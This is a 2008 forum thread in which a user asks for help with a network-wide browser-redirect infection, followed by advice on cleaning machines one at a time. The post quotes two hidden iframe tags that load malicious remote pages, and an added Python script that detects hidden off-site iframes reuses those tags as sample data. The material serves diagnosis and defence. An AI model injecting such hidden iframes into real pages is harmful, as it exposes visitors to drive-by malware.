
Always Get Redirected To Http://kiddy.online.sh.cn/upimages/test/index.htm



#1 EESP


Posted 15 April 2008 - 09:07 AM

Hi All,

It's the first time I have posted here; I feel happy to join this site.

It seems all computers through our network are infected by an unknown trojan or malware.

Two weeks ago, when we opened some sites on the web, we got a blank page and were redirected to the following site.
"http://kiddy.online.sh.cn/upimages/test/index.htm"

It seems my browser is hijacked. Isn't it?
The following tag is inserted at the top, on the first line, of the redirected HTML page.
<iframe src='http://kiddy.online.sh.cn/upimages/test/index.htm' width=0 height=0</iframe>

I have been unable to remove the browser hijacker so far.
Neither the latest version of Avast, Nod32, Lavasoft Ad-aware, SpyBot SD nor Malwarebytes' Anti-Malware can find or remove it.
Whether I use Firefox or IE, I get the same result.

Today I just saw that HTML pages are redirected to "http://www.sxblgg.com/inc/he1p.htm".
The following tag is inserted at the top, on the first line, of the redirected HTML page.
<iframe src='http://www.sxblgg.com/inc/he1p.htm' width=1 height=1</iframe>
It seems "http://www.sxblgg.com/inc/he1p.htm" contains a JavaScript program. So the first thing I did was to disable any JavaScript download.

I am not sure, but I've heard some Mac machines have also been infected.

Kindly please advise how to remove this...

Thanks in advance and Regards.

Info about my computer:
-running OS Windows XP
-Browser Mozilla Firefox / IE
-Nod32 Anti-virus.
-Ad-aware
-Spybot Search and destroy
-Malwarebytes' Anti-Malware
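
One way to check saved copies of affected pages for the kind of tag quoted in the post above, as an added example that is not part of the original thread: it flags off-site iframes of at most 1x1 pixels and tolerates the missing `>` seen in the quoted tags. The function names, the page host `intranet.example` and the sample page are constructed; only the two iframe tags come from the post.

```python
import re
from urllib.parse import urlparse

# Opening <iframe ...> tag. Also accepts the malformed form quoted in the post,
# where the attributes run straight into </iframe> with no closing '>'.
IFRAME_RE = re.compile(r"<iframe\b(?P<attrs>[^<>]*)(?:>|(?=</iframe))", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s'"<>]+))""")

# Constructed sample page; only the two iframe tags are taken from the post.
SAMPLE = """<iframe src='http://kiddy.online.sh.cn/upimages/test/index.htm' width=0 height=0</iframe>
<html><body>
<iframe src="http://maps.example/embed" width="600" height="400"></iframe>
<iframe src='http://www.sxblgg.com/inc/he1p.htm' width=1 height=1</iframe>
<iframe src="/local/frame.html" width="0" height="0"></iframe>
</body></html>
"""

def _px(value):
    """Return a width/height attribute as an integer pixel count, or None."""
    m = re.match(r"\s*(\d+)\s*(?:px)?\s*$", value or "", re.I)
    return int(m.group(1)) if m else None

def find_hidden_iframes(html, page_host, max_px=1):
    """Report off-site iframes whose width and height are both <= max_px."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = {}
        for a in ATTR_RE.finditer(m.group("attrs")):
            value = next(g for g in a.groups()[1:] if g is not None)
            attrs[a.group(1).lower()] = value
        w, h = _px(attrs.get("width")), _px(attrs.get("height"))
        if w is None or h is None or w > max_px or h > max_px:
            continue  # visible frame, or size not given as plain pixels
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        if not host or host == page_host.lower():
            continue  # relative or same-host frame
        findings.append({
            "line": html.count("\n", 0, m.start()) + 1,
            "src": src, "host": host, "width": w, "height": h,
            "malformed": not m.group(0).endswith(">"),
        })
    return findings

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE, "intranet.example"):
        print(f)
```

Frames hidden with CSS rather than `width`/`height` attributes are outside what this check covers.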


 


#2 DaChew


Posted 15 April 2008 - 09:38 AM

"It seems all computers through our network are infected"


do you know how to clean a network?

who's the system administrator?
Chewy

No. Try not. Do... or do not. There is no try.

#3 EESP


Posted 15 April 2008 - 09:58 AM

Hi,
Thanks for replying so soon,

"do you know how to clean a network?"

No, I don't.

"who's the system administrator?"

Just a co-worker; we've been trying to get rid of it now.

#4 DaChew


Posted 15 April 2008 - 10:27 AM

I have only done one myself, first isolate one machine and disinfect it, once you have the removal procedure down you can do all the others, the key is to have them disconnected from the network.

A large company I know operating a regional call center reimaged over 100 machines overnight to get back on line.

http://www.bleepingcomputer.com/forums/ind...st&p=797504

your test machine would follow this procedure, as soon as the downloads are finished, disconnect from the network and shut down any resident protection and start the scans and fixes

save the logs and post back, use a floppy

the important thing to remember is if you reconnect a clean computer to the network and there's still one infected connected, you are back starting all over again

you can download the updates later manually if you need to pull all the infected machines off the network
Chewy


#5 DaChew


Posted 15 April 2008 - 10:47 AM

another tool to use is

http://www.bleepingcomputer.com/forums/ind...st&p=797472

If you execute this on a clean computer, it will disinfect and immunize a usb flash drive, in case your infection can spread that way also

Ignore the sdfix part till later, it's a very useful tool if needed

Edited by DaChew, 15 April 2008 - 11:49 AM.

Chewy




